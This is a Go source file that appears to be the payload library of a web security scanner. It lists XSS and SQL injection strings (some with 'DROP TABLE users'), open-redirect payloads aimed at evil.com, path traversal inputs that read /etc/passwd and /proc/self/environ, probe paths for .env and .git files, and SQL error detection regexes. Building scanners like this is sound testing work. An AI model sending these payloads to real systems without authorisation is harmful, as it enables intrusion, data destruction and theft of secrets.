// Package payloads provides security testing payloads for web application testing
package payloads

// XSSPayloads contains reflected XSS payloads for testing
var XSSPayloads = []string{
	"<script>alert(1)</script>",
	"><img src=x onerror=alert(1)>",
	"javascript:alert(1)",
	"';alert(1)//",
	"<svg onload=alert(1)>",
	"<img src=x onerror=alert(1)>",
	"<body onload=alert(1)>",
	"<iframe src=javascript:alert(1)>",
	"<input onfocus=alert(1) autofocus>",
	"<select onfocus=alert(1) autofocus>",
	"<textarea onfocus=alert(1) autofocus>",
	"<keygen onfocus=alert(1) autofocus>",
	"<video><source onerror=alert(1)>",
	"<audio src=x onerror=alert(1)>",
	"<marquee onstart=alert(1)>",
	"<details ontoggle=alert(1)>",
	"<meter onmouseover=alert(1)>",
	"<progress onmouseover=alert(1) value=0.5>",
	"<object data=javascript:alert(1)>",
	"<embed src=javascript:alert(1)>",
	"<math><mtext onmouseover=alert(1)>",
	"<form><button formaction=javascript:alert(1)>",
	"<isindex type=image src=x onerror=alert(1)>",
	"<applet code=javascript:alert(1)>",
	"<frame src=javascript:alert(1)>",
	"<frameset onload=alert(1)>",
}

// SQLiErrorPayloads contains error-based SQL injection payloads
var SQLiErrorPayloads = []string{
	"'",
	"''",
	";--",
	"'--",
	"\"--",
	"' OR '1'='1",
	"' OR '1'='1'--",
	"' OR 1=1--",
	"\" OR \"1\"=\"1",
	"' AND 1=1--",
	"' AND 1=2--",
	"1' UNION SELECT 1--",
	"1' AND 1=CONVERT(int, (SELECT @@version))--",
	"1' AND 1=(SELECT 1 FROM information_schema.tables)--",
	"' OR 'x'='x",
	"1; DROP TABLE users--",
	"1'; DROP TABLE users--",
	"1\"; DROP TABLE users--",
	"1') OR ('1'='1",
	"1')) OR (('1'='1",
	"1'||(SELECT '')||'",
	"1'+(SELECT 1)+'",
	"1' AND 1=0 UNION SELECT null, version()--",
	"1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT @@version)))--",
	"1' AND 1=0; SELECT @@version--",
	"1' AND 1=0; SELECT banner FROM v$version--",
}

// OpenRedirectParams contains common parameter names for open redirect testing
var OpenRedirectParams = []string{
	"redirect",
	"url",
	"next",
	"return",
	"returnTo",
	"return_url",
	"return_to",
	"goto",
	"target",
	"dest",
	"destination",
	"redir",
	"redirect_uri",
	"redirect_url",
	"redirect_to",
	"continue",
	"return_path",
	"path",
	"link",
	"href",
	"forward",
	"view",
	"go",
	"jump",
}

// OpenRedirectPayloads contains payloads for testing open redirects
var OpenRedirectPayloads = []string{
	"https://evil.com",
	"//evil.com",
	`//evil.com`,
	"http://evil.com",
	"https://evil.com/@target.com",
	"//evil.com/%2f..",
	`/\/evil.com`,
	"evil.com",
	"https://target.com.evil.com",
	"https://evil%2ecom",
	"//evil%2ecom",
	"https://evil%E3%80%82com",
}

// PathTraversalPayloads contains payloads for path traversal testing
var PathTraversalPayloads = []string{
	"../../../etc/passwd",
	"..\\..\\..\\windows\\win.ini",
	"....//....//....//etc/passwd",
	"..%2f..%2f..%2fetc%2fpasswd",
	"%2e%2e/%2e%2e/%2e%2e/etc/passwd",
	"..\u002f..\u002f..\u002fetc\u002fpasswd",
	"....\\....\\....\\etc\\passwd",
	"..%5c..%5c..%5cetc%5cpasswd",
	"..%252f..%252f..%252fetc%252fpasswd",
	"..\\/..\\/..\\/etc/passwd",
	"..\\../..\\../etc/passwd",
	"etc/passwd",
	"c:\\windows\\win.ini",
	"c:/windows/win.ini",
	"..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
	"../../../proc/self/environ",
	"../../../var/log/apache2/access.log",
	"file:///etc/passwd",
	"file://c:/windows/win.ini",
	"php://filter/read=convert.base64-encode/resource=index.php",
}

// SensitivePaths contains common sensitive paths that should be checked
var SensitivePaths = []string{
	// Environment files
	"/.env",
	"/.env.local",
	"/.env.production",
	"/.env.development",
	"/.env.staging",
	"/.env.test",
	"/.env.example",
	"/.env.backup",
	"/.env.save",
	"/.env~",
	"/.env.bak",

	// Git repository
	"/.git/config",
	"/.git/HEAD",
	"/.git/index",
	"/.git/logs/HEAD",
	"/.git/description",
	"/.gitignore",
	"/.gitattributes",

	// Backup files
	"/backup.zip",
	"/backup.tar",
	"/backup.tar.gz",
	"/backup.tgz",
	"/backup.rar",
	"/backup.7z",
	"/backup.sql",
	"/db.sql",
	"/database.sql",
	"/dump.sql",
	"/backup/",
	"/backups/",
	"/backup.old/",
	"/old/",

	// Config files
	"/config.php",
	"/wp-config.php",
	"/configuration.php",
	"/config.json",
	"/config.xml",
	"/config.yaml",
	"/config.yml",
	"/config.ini",
	"/config/",
	"/configuration/",
	"/conf/",
	"/settings.php",
	"/settings.json",

	// Info files
	"/phpinfo.php",
	"/info.php",
	"/php.php",
	"/test.php",
	"/i.php",
	"/pinfo.php",

	// Server status
	"/server-status",
	"/server-info",
	"/status",
	"/stats",
	"/server-status?auto",
	"/nginx_status",
	"/apache-status",

	// Admin panels
	"/admin",
	"/administrator",
	"/admin/",
	"/administrator/",
	"/admin/login",
	"/admin/login.php",
	"/admin/index.php",
	"/wp-admin",
	"/wp-login.php",
	"/login",
	"/login.php",
	"/signin",
	"/signin.php",
	"/dashboard",
	"/dashboard/",
	"/console",
	"/console/",
	"/manage",
	"/management",
	"/manager",
	"/moderator",
	"/webadmin",
	"/adminpanel",
	"/controlpanel",
	"/cpanel",
	"/memberadmin",
	"/adminLogin",
	"/admin_login",

	// API documentation
	"/api/docs",
	"/api/documentation",
	"/api/swagger",
	"/api/swagger-ui",
	"/api/swagger.json",
	"/api/swagger.yaml",
	"/swagger",
	"/swagger-ui",
	"/swagger.json",
	"/swagger.yaml",
	"/swagger-ui.html",
	"/api/v2/swagger.json",
	"/api/v1/swagger.json",
	"/openapi.json",
	"/openapi.yaml",
	"/api/openapi.json",
	"/api/openapi.yaml",
	"/api/schema",
	"/graphql",
	"/graphiql",
	"/playground",

	// Misc sensitive files
	"/.DS_Store",
	"/.htaccess",
	"/.htpasswd",
	"/web.config",
	"/crossdomain.xml",
	"/clientaccesspolicy.xml",
	"/robots.txt",
	"/sitemap.xml",
	"/sitemap.xml.gz",
	"/security.txt",
	"/.well-known/security.txt",
	"/humans.txt",
	"/.well-known/",

	// Source code
	"/source.zip",
	"/src.zip",
	"/app.zip",
	"/archive.zip",
	"/www.zip",
	"/html.zip",
	"/public.zip",
	"/dist.zip",
	"/build.zip",
	"/release.zip",
	"/deploy.zip",
	"/web.zip",

	// Docker
	"/docker-compose.yml",
	"/docker-compose.yaml",
	"/Dockerfile",
	"/.dockerignore",

	// IDE
	"/.idea/",
	"/.vscode/",
	"/.vs/",
	"/nbproject/",

	// Logs
	"/logs/",
	"/log/",
	"/error.log",
	"/access.log",
	"/debug.log",
	"/application.log",
	"/app.log",

	// Uploads
	"/uploads/",
	"/upload/",
	"/files/",
	"/images/",
	"/img/",
	"/media/",
	"/assets/",
	"/static/",
	"/public/",
	"/resources/",

	// VCS
	"/.svn/",
	"/.svn/entries",
	"/.cvs/",
	"/.hg/",
	"/.bzr/",
	"/.tfignore",

	// Package managers
	"/package.json",
	"/package-lock.json",
	"/yarn.lock",
	"/composer.json",
	"/composer.lock",
	"/Gemfile",
	"/Gemfile.lock",
	"/requirements.txt",
	"/Pipfile",
	"/Pipfile.lock",
	"/pom.xml",
	"/build.gradle",
	"/go.mod",
	"/go.sum",
	"/Cargo.toml",
	"/Cargo.lock",

	// CI/CD
	"/.github/",
	"/.gitlab-ci.yml",
	"/.travis.yml",
	"/.circleci/",
	"/Jenkinsfile",
	"/azure-pipelines.yml",
	"/bitbucket-pipelines.yml",
}

// CommonDirectories contains common directory paths for brute forcing
var CommonDirectories = []string{
	"admin", "administrator", "api", "app", "application", "backup", "backups",
	"bin", "cgi-bin", "conf", "config", "console", "css", "dashboard", "data",
	"db", "debug", "demo", "dev", "develop", "development", "dist", "doc", "docs",
	"download", "downloads", "email", "export", "files", "forum", "help", "home",
	"i18n", "image", "images", "img", "include", "includes", "install", "js",
	"json", "jsp", "lib", "library", "local", "log", "login", "logs", "mail",
	"media", "member", "members", "misc", "mobile", "mod", "module", "modules",
	"new", "old", "order", "orders", "panel", "pass", "passwd", "password",
	"private", "prod", "product", "products", "profile", "public", "resource",
	"resources", "rest", "script", "scripts", "search", "secure", "security",
	"server", "service", "services", "session", "sessions", "setup", "share",
	"shared", "shop", "source", "src", "stat", "static", "stats", "storage",
	"store", "support", "sys", "system", "temp", "test", "testing", "tmp",
	"tool", "tools", "upload", "uploads", "user", "users", "var", "vendor",
	"web", "webadmin", "wp-admin", "wp-content", "wp-includes", "xmlrpc",
}

// SQLiErrorPatterns contains regex patterns for detecting SQL errors
var SQLiErrorPatterns = []string{
	`SQL syntax.*MySQL`,
	`Warning.*mysql_.*`,
	`MySQLSyntaxErrorException`,
	`valid MySQL result`,
	`MySqlException`,
	`ORA-[0-9]{4,5}`,
	`Oracle error`,
	`Oracle.*Driver`,
	`Warning.*oci_.*`,
	`Warning.*ora_.*`,
	`PostgreSQL.*ERROR`,
	`Warning.*pg_.*`,
	`valid PostgreSQL result`,
	`Npgsql\.`,
	`PG::Error`,
	`PSQLException`,
	`Driver.*SQL.*Server`,
	`OLE DB.*SQL Server`,
	`SQL Server.*Driver`,
	`Warning.*mssql_.*`,
	`Warning.*sybase.*`,
	`Sybase message`,
	`Sybase.*Server message`,
	`Warning.*sqlite_.*`,
	`SQLite/JDBCDriver`,
	`SQLiteException`,
	`System.Data.SQLite.SQLiteException`,
	`Unknown column`,
	`syntax error`,
	`syntax error at or near`,
	`unrecognized token`,
	`near ".*": syntax error`,
	`Unclosed quotation mark`,
	`incorrect syntax near`,
	`You have an error in your SQL syntax`,
	`mysql_fetch_array`,
	`mysql_fetch_assoc`,
	`mysql_num_rows`,
	`mysql_result`,
	`odbc_exec`,
	`odbc_execute`,
	`Microsoft SQL Native Client error`,
	`SQLServer JDBC Driver`,
	`SqlException`,
	`Procedure.*requires parameter`,
	`PLS-[0-9]{4,5}`,
	`supplied argument is not a valid MySQL result resource`,
}

// SecurityHeaders contains important security headers to check
var SecurityHeaders = map[string]string{
	"Content-Security-Policy":      "default-src 'self'",
	"Strict-Transport-Security":    "max-age=31536000; includeSubDomains",
	"X-Frame-Options":              "DENY",
	"X-Content-Type-Options":       "nosniff",
	"X-XSS-Protection":             "1; mode=block",
	"Referrer-Policy":              "strict-origin-when-cross-origin",
	"Permissions-Policy":           "geolocation=(), microphone=(), camera=()",
	"Cross-Origin-Embedder-Policy": "require-corp",
	"Cross-Origin-Opener-Policy":   "same-origin",
	"Cross-Origin-Resource-Policy": "same-origin",
}

// WeakTLSVersions contains deprecated TLS versions
var WeakTLSVersions = []string{
	"SSLv3",
	"TLS1.0",
	"TLS1.1",
}

// InsecureCiphers contains known insecure cipher suites
var InsecureCiphers = []string{
	"NULL",
	"EXPORT",
	"DES",
	"MD5",
	"RC4",
	"CBC3",
	"3DES",
}
